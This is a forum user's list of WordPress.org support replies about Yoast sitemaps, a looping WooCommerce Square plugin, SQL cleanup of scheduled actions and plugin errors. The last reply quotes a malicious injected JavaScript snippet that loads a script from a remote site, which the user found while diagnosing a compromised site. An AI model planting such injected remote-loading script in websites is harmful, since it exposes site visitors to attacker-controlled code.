hdaackda
Forum Replies Created
-
@Darshana ok this is wierd
I set it to ZOHO using API and Reply To doesn’t work
But setting up ZOHO with SMTP works! Is there any way to make it work with Zoho’s API thingy?
Forum: Plugins
In reply to: [Yoast SEO] google cannpt get my product sitemapsdear @maybellyne Maybellyne
I have tried that too. But if I submit only the main sitemap, Google only shows “2097” discovered pages (even though there are over 17k)
And they seem to skip all product pages
“Give Google some time to process the sitemap.”
How much? Already gave it OVER 1 MONTH. (over 2 actually.. ) when noticed no change, then decided to try and submit product sitemaps but keep seeing this error
P.S. using the premium plugin (22.3) and also the Woocommerce addon (16.2).. hope that woocommerce addon is not the issue?
Forum: Plugins
In reply to: [Yoast SEO] google cannpt get my product sitemaps@melissadb screenshot
this “cound’t fetch” is not being solved. no matter what (tried adding all product sitemaps)
the “success” one is also showing only 2k discovered pages! (there should be above 20k). our website gets over 50k genuine traffic per month (from social media mostly)
- This reply was modified 2 months, 3 weeks ago by hdaackda.
Forum: Plugins
In reply to: [Yoast SEO] google cannpt get my product sitemapshello @melissadb
thats the wierd part. normal sitemap only showing 2000 urls in google sitemap (even though the sitemap has over 17k urls).
I can access the sitemap from any browser and even google fetch can access it (but says not indexable)
there are about 7 product sitemaps (6500+ products) but google sitemap hasn’t indexed at all
waited over a month. tried to remove everything and add it back.. still get the “couldn’t fetch”
@shameemreza thanks, figured it out, marking this as resolved. Issue was created by Woo Square plugin 4.5.0. It was creating hundreds of requests every second on a loop so it was clogging the requests. They have apparently now fixed the plugin, so do update to 4.5.1
I also deleted all the pending requests from that plugin’s hook “wc_square_init_payment_token_migration” from the database using SQL (literally over half a million) and then woocommerce database got updated.
Thanks!also, HOW DO I DOWNGRADE the plugin while square sorts this out??
hi
Plugin Support ckadenge (woo-hc) (@ckadenge)
I also want to delete completed and even pending actions. will that harm my site?
also in the below commands, it gives an error. Is it ok If I remove the quotes from the table name
DELETE FROM ‘wp_actionscheduler_actions’ WHERE ‘status’ = ‘complete’
DELETE FROM ‘wp_actionscheduler_actions’ WHERE ‘status’ = ‘canceled’
DELETE FROM ‘wp_actionscheduler_actions’ WHERE ‘status’ = ‘failed’(I can remove ‘ from wp_actionscheduler_actions and then it’ll work?)
“Action Scheduler: 294821 past-due actions found; something may be wrong.”
Forum: Plugins
In reply to: [WooCommerce] Version 7.8.0 creates a “Adding new attribute failed.” errorSame issue, cant figure it out why. I am not even adding a new product but randomnly get this on the products page
Forum: Plugins
In reply to: [Better Search Replace] Error Message Saying to Decrease Max Page SizeSame issue, I have set it to the minimum (1000) allowed, yet get an error
Begin System Info -- WordPress Configuration Site URL: -- Home URL: -- Multisite: No Version: 6.1.1 Language: en_US Table Prefix: Length: 5 WP_DEBUG: Disabled Memory Limit: 512M -- Better Search Replace Configuration Plugin Version: 1.4.2 Max Page Size: 1000 -- Server Configuration Operating System: Linux PHP Version: 7.4.24 MySQL Version: 5.5.5 Server Software: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fips -- PHP Configuration Memory Limit: 2048M Post Max Size: 100M Upload Max Filesize: 100M Time Limit: 300 Max Input Vars: 1000 Display Errors: On (1) End System Info
Forum: Fixing WordPress
In reply to: Wierd problem. Cant Post or even preview new postsIT IS SOLVED… I think it might have been due to the fact that I changed PHP versions..reverted back to old (5.6) one.. and rebooted.. problem solved. Pls close this
Forum: Fixing WordPress
In reply to: Wierd problem. Cant Post or even preview new postsoops sorry didnt know bout that rule…
Any ways, ppl, any ideas or solutions? Will try myself and report.. What should I do? any data that might help in figuring this out??
Most welcome ?? really like your free plugin ??
Forum: Fixing WordPress
In reply to: Find a specific link inside code^ahhh ok
thanks
will use filezilla to try and figure it out…
btw, any idea what XPath is (using firebug)… or whats the meaning of
/html/head/script[19]
Forum: Fixing WordPress
In reply to: Find a specific link inside codeOne solution in my mind is to download the WHOLE website, then use a text searcher (like notepad++) etc.. but that is tooo inefficient, esp if the site is big
EDIT
using the FIREBUG Addon… if I double click on that malicious <script> code… I get
var oScript = document.createElement("script"); oScript.type = "text/javascript"; oScript.src = "LINK OF mALICIOUS SITE HERE"; document.getElementsByTagName("head")[0].appendChild(oScript);